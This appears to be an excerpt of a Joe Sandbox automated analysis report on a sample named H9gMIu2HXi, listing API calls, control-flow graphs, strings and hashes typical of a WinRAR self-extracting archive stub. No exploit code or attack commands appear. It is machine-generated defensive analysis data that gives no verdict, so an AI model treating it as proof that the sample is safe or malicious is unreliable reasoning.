a28f28 99 API calls 25696->25965 25966 a2237a 74 API calls 25697->25966 25718 a29bb8 25700->25718 25703->25675 25968 a2851f 50 API calls 2 library calls 25703->25968 25705 a29b41 25976 a27951 77 API 
Graph data from the interactive execution-graph viewer (node and edge listing, not reproduced). API calls named by the graph's nodes, grouped:
  • Archive and file handling: CreateFileW, ReadFile, WriteFile, SetFilePointer, SetEndOfFile, FlushFileBuffers, SetFileTime, GetFileType, GetFileAttributesW, DeleteFileW, FindFirstFileW, FindNextFileW, FindCloseChangeNotification, GetCurrentDirectoryW, SetCurrentDirectoryW, SHFileOperationW, GetStdHandle, CloseHandle, GetLastError
  • SFX startup and user interface: GetCommandLineW, OpenFileMappingW, MapViewOfFile, UnmapViewOfFile, SetEnvironmentVariableW, GetModuleFileNameW, GetLocalTime, LoadIconW, LoadBitmapW, DialogBoxParamW, GetDlgItem, SetDlgItemTextW, ShowWindow, SendMessageW, PeekMessageW, GetMessageW, IsDialogMessageW, TranslateMessage, DispatchMessageW, LoadStringW, WaitForSingleObject, Sleep, DeleteObject, GetDC, GetDeviceCaps, ReleaseDC, GetObjectW, OleInitialize, OleUninitialize, GdiplusStartup, GdiplusShutdown, SHGetMalloc, FindResourceW, SizeofResource, LoadResource, LockResource, GlobalAlloc, GlobalLock, GlobalUnlock, GlobalFree, GdipAlloc, GdipFree, GdipCloneImage, GdipDisposeImage, GdipCreateBitmapFromStream, GdipCreateBitmapFromStreamICM, GdipCreateHBITMAPFromBitmap, AllocConsole, AttachConsole, WriteConsoleW, FreeConsole, GetCurrentProcessId, ExitProcess
  • Library loading, self-inspection and process control: GetModuleHandleW, GetModuleHandleExW, GetProcAddress, LoadLibraryW, LoadLibraryExW, FreeLibrary, GetSystemDirectoryW, GetVersionExW, GetPEB, GetCurrentProcess, TerminateProcess, IsDebuggerPresent, IsProcessorFeaturePresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, SetThreadExecutionState, RaiseException, GetStartupInfoW
  • String, locale and C runtime support: MultiByteToWideChar, WideCharToMultiByte, CharUpperW, CompareStringW, GetCPInfo, IsDBCSLeadByte, RtlAllocateHeap, RtlFreeHeap, TlsAlloc, SetLastError, InitializeCriticalSectionAndSpinCount, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, KiUserCallbackDispatcher

Control-flow Graph

APIs
  • Part of subcall function 00A31B83: GetModuleHandleW.KERNEL32(kernel32), ref: 00A31B9C
  • Part of subcall function 00A31B83: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00A31BAE
  • Part of subcall function 00A31B83: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00A31BDF
  • Part of subcall function 00A3B65D: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00A3B665
  • Part of subcall function 00A3BD1B: OleInitialize.OLE32(00000000), ref: 00A3BD34
  • Part of subcall function 00A3BD1B: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00A3BD6B
  • Part of subcall function 00A3BD1B: SHGetMalloc.SHELL32(00A6A460), ref: 00A3BD75
• GetCommandLineW.KERNEL32 ref: 00A3F09B
• OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 00A3F0C5
• MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007402), ref: 00A3F0D6
• UnmapViewOfFile.KERNEL32(00000000), ref: 00A3F127
  • Part of subcall function 00A3ED2E: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00A3ED44
  • Part of subcall function 00A3ED2E: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00A3ED80
  • Part of subcall function 00A30752: _wcslen.LIBCMT ref: 00A30776
• CloseHandle.KERNEL32(00000000), ref: 00A3F12E
• GetModuleFileNameW.KERNEL32(00000000,00A80CC0,00000800), ref: 00A3F148
• SetEnvironmentVariableW.KERNEL32(sfxname,00A80CC0), ref: 00A3F154
• GetLocalTime.KERNEL32(?), ref: 00A3F15F
• _swprintf.LIBCMT ref: 00A3F19E
• SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 00A3F1B3
• GetModuleHandleW.KERNEL32(00000000), ref: 00A3F1BA
• LoadIconW.USER32(00000000,00000064), ref: 00A3F1D1
• DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001C9D0,00000000), ref: 00A3F222
• Sleep.KERNELBASE(?), ref: 00A3F250
• DeleteObject.GDI32 ref: 00A3F289
• DeleteObject.GDI32(?), ref: 00A3F299
• CloseHandle.KERNEL32 ref: 00A3F2DC
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                               • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf_wcslen
                                                                                              • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                                                                              • API String ID: 3014515783-3710569615
                                                                                              • Opcode ID: 45dfe769e33463fb96ddda4d296b7487c0d315f76ad29b5cb4a143a3cfe82cdf
                                                                                              • Instruction ID: ba07476001436e8ba34199eda968126dcb27f130015ae7943712db94c2c0ff99
                                                                                              • Opcode Fuzzy Hash: 45dfe769e33463fb96ddda4d296b7487c0d315f76ad29b5cb4a143a3cfe82cdf
                                                                                              • Instruction Fuzzy Hash: 9D61F4B1900300BFD320EBE5ED49F6B7BECFB59345F000529FA45921A1DB749986CB62
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              control_flow_graph 739 a3b6d2-a3b6ef FindResourceW 740 a3b6f5-a3b706 SizeofResource 739->740 741 a3b7eb 739->741 740->741 743 a3b70c-a3b71b LoadResource 740->743 742 a3b7ed-a3b7f1 741->742 743->741 744 a3b721-a3b72c LockResource 743->744 744->741 745 a3b732-a3b747 GlobalAlloc 744->745 746 a3b7e3-a3b7e9 745->746 747 a3b74d-a3b756 GlobalLock 745->747 746->742 748 a3b7dc-a3b7dd GlobalFree 747->748 749 a3b75c-a3b77a call a42dc0 747->749 748->746 753 a3b7d5-a3b7d6 GlobalUnlock 749->753 754 a3b77c-a3b79e call a3b636 749->754 753->748 754->753 759 a3b7a0-a3b7a8 754->759 760 a3b7c3-a3b7d1 759->760 761 a3b7aa-a3b7be GdipCreateHBITMAPFromBitmap 759->761 760->753 761->760 762 a3b7c0 761->762 762->760
                                                                                              APIs
                                                                                              • FindResourceW.KERNELBASE(?,PNG,00000000,?,?,?,00A3C92D,00000066), ref: 00A3B6E5
                                                                                              • SizeofResource.KERNEL32(00000000,?,?,?,00A3C92D,00000066), ref: 00A3B6FC
                                                                                              • LoadResource.KERNEL32(00000000,?,?,?,00A3C92D,00000066), ref: 00A3B713
                                                                                              • LockResource.KERNEL32(00000000,?,?,?,00A3C92D,00000066), ref: 00A3B722
                                                                                              • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,?,00A3C92D,00000066), ref: 00A3B73D
                                                                                              • GlobalLock.KERNEL32(00000000,?,?,?,?,?,00A3C92D,00000066), ref: 00A3B74E
                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00A3B7D6
                                                                                                • Part of subcall function 00A3B636: GdipAlloc.GDIPLUS(00000010), ref: 00A3B63C
                                                                                              • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00A3B7B7
                                                                                              • GlobalFree.KERNEL32(00000000), ref: 00A3B7DD
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                               • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: GlobalResource$AllocGdipLock$BitmapCreateFindFreeFromLoadSizeofUnlock
                                                                                              • String ID: PNG
                                                                                              • API String ID: 541704414-364855578
                                                                                              • Opcode ID: 302a52f3920fb186a79dfbb4e3e2fb639a3b31d24d2cf7638b948eee759b0654
                                                                                              • Instruction ID: 0c82b23c69e07b488aabfec10a638635d6e7c8c3b907d9c291575cd3bcadd81b
                                                                                              • Opcode Fuzzy Hash: 302a52f3920fb186a79dfbb4e3e2fb639a3b31d24d2cf7638b948eee759b0654
                                                                                              • Instruction Fuzzy Hash: D1318171615702AFD710DFA1EC88D1B7FA9FF89756F010628FA05C2260EB31D886CB60
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              control_flow_graph 1068 a2ba94-a2bab8 call a3ffd0 1071 a2bb20-a2bb29 FindNextFileW 1068->1071 1072 a2baba-a2bac7 FindFirstFileW 1068->1072 1073 a2bb3b-a2bbf8 call a3192f call a2d71d call a32924 * 3 1071->1073 1074 a2bb2b-a2bb39 GetLastError 1071->1074 1072->1073 1075 a2bac9-a2badb call a2cf32 1072->1075 1080 a2bbfd-a2bc0a 1073->1080 1076 a2bb12-a2bb1b 1074->1076 1082 a2baf7-a2bb00 GetLastError 1075->1082 1083 a2badd-a2baf5 FindFirstFileW 1075->1083 1076->1080 1085 a2bb02-a2bb05 1082->1085 1086 a2bb10 1082->1086 1083->1073 1083->1082 1085->1086 1088 a2bb07-a2bb0a 1085->1088 1086->1076 1088->1086 1091 a2bb0c-a2bb0e 1088->1091 1091->1076
                                                                                              APIs
                                                                                              • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00A2B98B,000000FF,?,?), ref: 00A2BABD
                                                                                                • Part of subcall function 00A2CF32: _wcslen.LIBCMT ref: 00A2CF56
                                                                                              • FindFirstFileW.KERNEL32(?,?,?,?,00000800,?,?,?,?,00A2B98B,000000FF,?,?), ref: 00A2BAEB
                                                                                              • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00A2B98B,000000FF,?,?), ref: 00A2BAF7
                                                                                              • FindNextFileW.KERNEL32(?,?,?,?,?,?,00A2B98B,000000FF,?,?), ref: 00A2BB21
                                                                                              • GetLastError.KERNEL32(?,?,?,?,00A2B98B,000000FF,?,?), ref: 00A2BB2D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                               • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileFind$ErrorFirstLast$Next_wcslen
                                                                                              • String ID:
                                                                                              • API String ID: 42610566-0
                                                                                              • Opcode ID: 7e48d5cf27a22cd25121426cfceb29e46a60f1748e1aa4785f59bcec225cf25c
                                                                                              • Instruction ID: a533a11a4919d875a86ba891661f6322bcab19a2f227c268e697e0836bcfc59f
                                                                                              • Opcode Fuzzy Hash: 7e48d5cf27a22cd25121426cfceb29e46a60f1748e1aa4785f59bcec225cf25c
                                                                                              • Instruction Fuzzy Hash: EC419472910629ABCB25DF68DC84BE9B3B8FB48350F1001A6F55DE3250D7346E94CFA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              control_flow_graph 1095 a3beff-a3bf16 call a3c324 1098 a3bfaf-a3bfb0 1095->1098 1099 a3bf1c-a3bf5e SetEntriesInAclW 1095->1099 1100 a3bf60-a3bf6d InitializeSecurityDescriptor 1099->1100 1101 a3bfad-a3bfae 1099->1101 1102 a3bf9f-a3bfa2 1100->1102 1103 a3bf6f-a3bf80 SetSecurityDescriptorDacl 1100->1103 1101->1098 1102->1101 1105 a3bfa4-a3bfa7 LocalFree 1102->1105 1103->1102 1104 a3bf82-a3bf99 CreateDirectoryW 1103->1104 1104->1102 1105->1101
                                                                                              APIs
                                                                                                • Part of subcall function 00A3C324: GetCurrentProcess.KERNEL32(00020008,00A3BF14,?,?,?,?,00A3BF14,?), ref: 00A3C333
                                                                                                • Part of subcall function 00A3C324: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,00A3BF14,?), ref: 00A3C33A
                                                                                                • Part of subcall function 00A3C324: GetTokenInformation.KERNELBASE(00A3BF14,00000001(TokenIntegrityLevel),00000000,00000000,?,?,?,?,?,00A3BF14,?), ref: 00A3C354
                                                                                                • Part of subcall function 00A3C324: GetLastError.KERNEL32(?,?,?,?,00A3BF14,?), ref: 00A3C35E
                                                                                                • Part of subcall function 00A3C324: GetTokenInformation.KERNELBASE(00A3BF14,00000001(TokenIntegrityLevel),00000000,?,?,?,?,?,?,?,00A3BF14,?), ref: 00A3C382
                                                                                                • Part of subcall function 00A3C324: CopySid.ADVAPI32(00000044,00A3BF14,00000000,?,?,?,?,?,00A3BF14,?), ref: 00A3C393
                                                                                              • SetEntriesInAclW.ADVAPI32(00000001,11060000,00000000,?,?,?,?), ref: 00A3BF56
                                                                                              • InitializeSecurityDescriptor.ADVAPI32(?,00000001,?,?,?), ref: 00A3BF65
                                                                                              • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000,?,?,?), ref: 00A3BF78
                                                                                              • CreateDirectoryW.KERNELBASE(?,0000000C,?,?,?), ref: 00A3BF99
                                                                                              • LocalFree.KERNEL32(?,?,?,?), ref: 00A3BFA7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                               • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: Token$DescriptorInformationProcessSecurity$CopyCreateCurrentDaclDirectoryEntriesErrorFreeInitializeLastLocalOpen
                                                                                              • String ID:
                                                                                              • API String ID: 2740647886-0
                                                                                              • Opcode ID: 760d0847321fe3c936668d12d6f1364c168a5415e96078972bf7f05f7f454cf9
                                                                                              • Instruction ID: b4f07fb34c88b91cbb3b9e65c95bd28d01cec8439ea65273e67d4d6cd22915c0
                                                                                              • Opcode Fuzzy Hash: 760d0847321fe3c936668d12d6f1364c168a5415e96078972bf7f05f7f454cf9
                                                                                              • Instruction Fuzzy Hash: 8F21B2B5C00218AEDB10CFA5DD48ADEBBBCFF44750F10805AE905E2210DB349A46DFA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 00A292CB
                                                                                                • Part of subcall function 00A2D656: _wcsrchr.LIBVCRUNTIME ref: 00A2D660
                                                                                                • Part of subcall function 00A2CAA0: _wcslen.LIBCMT ref: 00A2CAA6
                                                                                                • Part of subcall function 00A31907: _wcslen.LIBCMT ref: 00A3190D
                                                                                                • Part of subcall function 00A2B5D6: _wcslen.LIBCMT ref: 00A2B5E2
                                                                                                • Part of subcall function 00A2B5D6: __aulldiv.LIBCMT ref: 00A2B60E
                                                                                                • Part of subcall function 00A2B5D6: GetCurrentProcessId.KERNEL32(00000000,?,000186A0,00000000,?,?,00000800,?), ref: 00A2B615
                                                                                                • Part of subcall function 00A2B5D6: _swprintf.LIBCMT ref: 00A2B640
                                                                                                • Part of subcall function 00A2B5D6: _wcslen.LIBCMT ref: 00A2B64A
                                                                                                • Part of subcall function 00A2B5D6: _swprintf.LIBCMT ref: 00A2B6A0
                                                                                                • Part of subcall function 00A2B5D6: _wcslen.LIBCMT ref: 00A2B6AA
                                                                                                • Part of subcall function 00A24727: __EH_prolog.LIBCMT ref: 00A2472C
                                                                                                • Part of subcall function 00A2A212: __EH_prolog.LIBCMT ref: 00A2A217
                                                                                                • Part of subcall function 00A2B8E6: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00A2B5B5,?,?,?,00A2B405,?,00000001,00000000,?,?), ref: 00A2B8FA
                                                                                                • Part of subcall function 00A2B8E6: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00A2B5B5,?,?,?,00A2B405,?,00000001,00000000,?,?), ref: 00A2B92B
                                                                                              Strings
                                                                                              • __tmp_reference_source_, xrefs: 00A29596
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                               • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen$H_prolog$AttributesFile_swprintf$CurrentProcess__aulldiv_wcsrchr
                                                                                              • String ID: __tmp_reference_source_
                                                                                              • API String ID: 70197177-685763994
                                                                                              • Opcode ID: 60db7b3f69115b24d41faf4eefd3f6794fdf0e800fe99c0665cf462d4d190887
                                                                                              • Instruction ID: d5bc24df24b0a96c2a8e7a4d1f24a0baf0226ff7c1ec0919c4f3e43ec7e46648
                                                                                              • Opcode Fuzzy Hash: 60db7b3f69115b24d41faf4eefd3f6794fdf0e800fe99c0665cf462d4d190887
                                                                                              • Instruction Fuzzy Hash: 15A24B31904265AFDF19DF78D995BEFBBB4BF15700F0801B9E8499B182D7309A88CB61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetCurrentProcess.KERNEL32(00000000,?,00A49186,00000000,00A5D570,0000000C,00A492DD,00000000,00000002,00000000), ref: 00A491D1
                                                                                              • TerminateProcess.KERNEL32(00000000,?,00A49186,00000000,00A5D570,0000000C,00A492DD,00000000,00000002,00000000), ref: 00A491D8
                                                                                              • ExitProcess.KERNEL32 ref: 00A491EA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                               • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: Process$CurrentExitTerminate
                                                                                              • String ID:
                                                                                              • API String ID: 1703294689-0
                                                                                              • Opcode ID: cbb7919400b6fec749de017867d40e010c430625fcb31261da12564e032b2f39
                                                                                              • Instruction ID: caf65b6f30c4a0db6d6c8f69b2e29276708e133ec20549ab01fc13692aa72769
                                                                                              • Opcode Fuzzy Hash: cbb7919400b6fec749de017867d40e010c430625fcb31261da12564e032b2f39
                                                                                              • Instruction Fuzzy Hash: 32E04F39000208ABCF11AFA4CD0CA8A3F6AFB84356F000114F90D47131CB75ED93CA40
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

APIs
• __EH_prolog.LIBCMT ref: 00A3C9D5
  • Part of subcall function 00A212F6: GetDlgItem.USER32(00000000,00003021), ref: 00A2133A
  • Part of subcall function 00A212F6: SetWindowTextW.USER32(00000000,00A545F4), ref: 00A21350
• SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00A3CAC1
• GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00A3CADF
• IsDialogMessageW.USER32(?,?), ref: 00A3CAF2
• TranslateMessage.USER32(?), ref: 00A3CB00
• DispatchMessageW.USER32(?), ref: 00A3CB0A
• GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 00A3CB2D
• EndDialog.USER32(?,00000001), ref: 00A3CB50
• GetDlgItem.USER32(?,00000068), ref: 00A3CB73
• SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00A3CB8E
• SendMessageW.USER32(00000000,000000C2,00000000,00A545F4), ref: 00A3CBA1
  • Part of subcall function 00A3E598: _wcslen.LIBCMT ref: 00A3E5C2
• SetFocus.USER32(00000000), ref: 00A3CBA8
• _swprintf.LIBCMT ref: 00A3CC07
  • Part of subcall function 00A24A20: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00A24A33
• GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 00A3CC6A
• GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?), ref: 00A3CC92
• GetTickCount.KERNEL32 ref: 00A3CCB0
• _swprintf.LIBCMT ref: 00A3CCC8
• GetLastError.KERNEL32(?,00000011), ref: 00A3CCFA
• GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00000000,00000000,00000000,?), ref: 00A3CD4D
• _swprintf.LIBCMT ref: 00A3CD84
• CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007402,winrarsfxmappingfile.tmp), ref: 00A3CDD8
• GetCommandLineW.KERNEL32 ref: 00A3CDEE
• MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,00A71482,00000400,00000001,00000001), ref: 00A3CE45
• ShellExecuteExW.SHELL32(0000003C), ref: 00A3CE6D
• WaitForInputIdle.USER32(?,00002710), ref: 00A3CEA1
• Sleep.KERNEL32(00000064), ref: 00A3CEB5
• UnmapViewOfFile.KERNEL32(?,?,0000421C,00A71482,00000400), ref: 00A3CEDE
• CloseHandle.KERNEL32(00000000), ref: 00A3CEE7
• _swprintf.LIBCMT ref: 00A3CF1A
• SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00A3CF79
• SetDlgItemTextW.USER32(?,00000065,00A545F4), ref: 00A3CF90
• GetDlgItem.USER32(?,00000065), ref: 00A3CF99
• GetWindowLongW.USER32(00000000,000000F0), ref: 00A3CFA8
• SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00A3CFB7
• SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00A3D064
• _wcslen.LIBCMT ref: 00A3D0BA
• _swprintf.LIBCMT ref: 00A3D0E4
• SendMessageW.USER32(?,00000080,00000001,?), ref: 00A3D12E
• SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 00A3D148
• GetDlgItem.USER32(?,00000068), ref: 00A3D151
• SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 00A3D167
• GetDlgItem.USER32(?,00000066), ref: 00A3D181
• SetWindowTextW.USER32(00000000,00A7389A), ref: 00A3D1A3
• SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 00A3D203
• SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00A3D216
• DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001C7B0,00000000,?), ref: 00A3D2B9
• EnableWindow.USER32(00000000,00000000), ref: 00A3D393
• SendMessageW.USER32(?,00000111,00000001,00000000), ref: 00A3D3D5
  • Part of subcall function 00A3D884: __EH_prolog.LIBCMT ref: 00A3D889
• SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00A3D3F9
Strings
Memory Dump Source
• Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
• Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
Similarity
• API ID: Item$MessageText$Send$Window_swprintf$File$DialogErrorLast$H_prologLongView_wcslen$CloseCommandCountCreateDispatchEnableExecuteFocusHandleIdleInputLineMappingModuleNameParamShellSleepTickTranslateUnmapWait__vswprintf_c_l
• String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
• API String ID: 3103142498-1645151803
• Opcode ID: 73ac00857137155291eb795d18160d54e5920accf4f6dfce7d13e7517096472c
• Instruction ID: d0f84fe3ac984f28e10e468d99a3051b21933041476d67205a1f732e0d31b309
• Opcode Fuzzy Hash: 73ac00857137155291eb795d18160d54e5920accf4f6dfce7d13e7517096472c
• Instruction Fuzzy Hash: 7A42E271940314BEEB21EBF4AD4EFBE7ABCAB11704F044165F645B60D2CBB44E468B22
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
